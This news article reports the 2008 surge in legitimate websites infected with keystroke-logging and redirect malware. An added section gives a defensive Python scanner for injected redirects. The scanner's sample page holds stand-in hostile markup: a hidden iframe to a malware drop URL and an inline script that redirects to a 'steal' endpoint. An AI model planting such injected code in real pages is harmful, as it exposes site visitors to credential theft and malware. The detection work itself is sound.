Number of infected Web sites sharply increases in 2008

Agencies should protect their Web sites from infection and take measures to keep employees from being tricked into visiting sites that contain malware.

The number of seemingly legitimate Web sites infected with malicious code that enables hackers to steal passwords to access computer networks is increasing, with one organization reporting an 827 percent jump in compromised sites in 2008.

The number of crimeware-infected URLs, which are Web sites containing malicious code designed to steal users' passwords by tracking their keystrokes, increased more than 163 percent in just one month, from 11,834 in November 2008 to 31,173 in December 2008, reported the Anti-Phishing Working Group, a coalition of industry and law enforcement agencies fighting identity theft from malware. In January 2008, just 3,363 sites were infected, according to the group.

"I think the numbers and information provided in the APWG report are pretty staggering," said Amit Yoran, chairman and chief executive officer of security software company NetWitness and former director of the Homeland Security Department's National Cybersecurity Division. "The federal agencies, like their counterparts in the private sector, are falling victim to these methods of exploitation. It is an ongoing and widespread problem that will continue to evolve and likely get significantly worse as criminal techniques evolve before they get any better."

The number of Web sites infected with malicious code is likely far more than reported by APWG, said Alan Paller, director of research at SANS Institute, a nonprofit group that researches cybersecurity. He estimated these sites are responsible for as much as 50 percent of "zombies," computers that have been compromised by a hacker.

The vulnerability, according to Paller, stems back to weak Web development. "People are told to visit only 'trusted Web sites,' but nearly all of the programmers who created those trusted sites made major errors that the bad guys figured out how to exploit," he said. "The solution is to ensure the programmers write secure code."

Such threats originating from legitimate Web domains increased 90 percent in 2008, according to a report released by Cisco. Typically, Web sites were infected with malicious code that redirected visitors to spoof sites that placed malware onto their computers. An estimated 20 percent of all legitimate sites have been infected by this type of attack, Cisco noted.

"Government agencies need to be concerned not only about inoculating their own agency Web sites from corruption, which in turn can infect visitors, but also protecting their networks from infected sites that their employees visit," said Gregory Garcia, who served as assistant secretary of cybersecurity and telecommunications at DHS during the Bush administration and now runs the information security consulting firm Garcia Strategies. "This threat is used by crime groups as well as nation states intent on espionage."

Federal agencies typically use antivirus software to block direct attacks against their networks, and employees are becoming more aware of phishing e-mail scams, which can download malicious software onto a computer by luring users to click on a link or attachment. The technique of infecting Web sites, however, is more difficult to detect, because the sites are often legitimate ones that agencies' firewalls rarely block. An increasing reliance on collaborative Web 2.0 technologies also makes federal agencies more vulnerable.
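Because the infected sites are themselves legitimate, domain-based blocking does not help; one defensive check is to inspect the content an agency's own site actually serves for injected redirects. The following added example (not from the article or any vendor named in it) scans a page for script sources, iframes, meta refreshes and inline redirects that point outside an assumed allowlist of the site's own hostnames; the sample page and hostnames are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

class InjectedRedirectFinder(HTMLParser):
    """Collect external script/iframe sources, meta refreshes and inline redirects."""
    def __init__(self, trusted_hosts):
        super().__init__()
        self.trusted = set(trusted_hosts)   # hostnames the site is expected to reference
        self.findings = []
        self._in_script = False

    def _check(self, kind, url):
        host = urlparse(url).hostname
        if host and host not in self.trusted:      # relative and same-site URLs are ignored
            self.findings.append((kind, url))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            self._in_script = True
            if a.get("src"):
                self._check("script-src", a["src"])
        elif tag == "iframe" and a.get("src"):
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "display:none" in style or a.get("width") == "0" or a.get("height") == "0"
            self._check("hidden-iframe" if hidden else "iframe", a["src"])
        elif tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = re.search(r"url=(\S+)", a.get("content") or "", re.I)
            if m:
                self._check("meta-refresh", m.group(1))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:   # inline script bodies: look for assignments to location
            for url in re.findall(r"""location(?:\.href)?\s*=\s*['"]([^'"]+)['"]""", data):
                self._check("inline-redirect", url)

def find_injected_redirects(html, trusted_hosts):
    p = InjectedRedirectFinder(trusted_hosts)
    p.feed(html)
    return p.findings

# Constructed sample: an otherwise normal page carrying three injected redirects.
SAMPLE_PAGE = """<html><head><meta http-equiv="refresh" content="5;url=http://spoof.example/login">
<script src="https://www.agency.example/js/app.js"></script></head>
<body><h1>Welcome</h1>
<iframe src="http://malware.example/drop.php" width="0" height="0"></iframe>
<script>if(document.cookie){location.href="http://spoof.example/steal";}</script>
</body></html>"""

if __name__ == "__main__":
    for kind, url in find_injected_redirects(SAMPLE_PAGE, {"www.agency.example"}):
        print(kind, url)
```

Run it periodically against a site's own pages and diff the findings against a known-good baseline; any new external reference is worth a look.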

"[These] have become the attack vectors of choice for sophisticated hacker crews because they recognize that Web sites can serve as launch points by which to island hop into a government or commercial enterprise network," said Tom Kellermann, vice president of security awareness at Core Security Technologies and former senior data risk management specialist for the World Bank treasury security team.

Agencies should test sensitive Web applications frequently to determine how vulnerable they are, Kellermann said, and then develop aggressive remediation timelines for addressing identified vulnerabilities. They also should test the security of Web applications hosted by third party companies, which often can serve as conduits for hacker attacks.
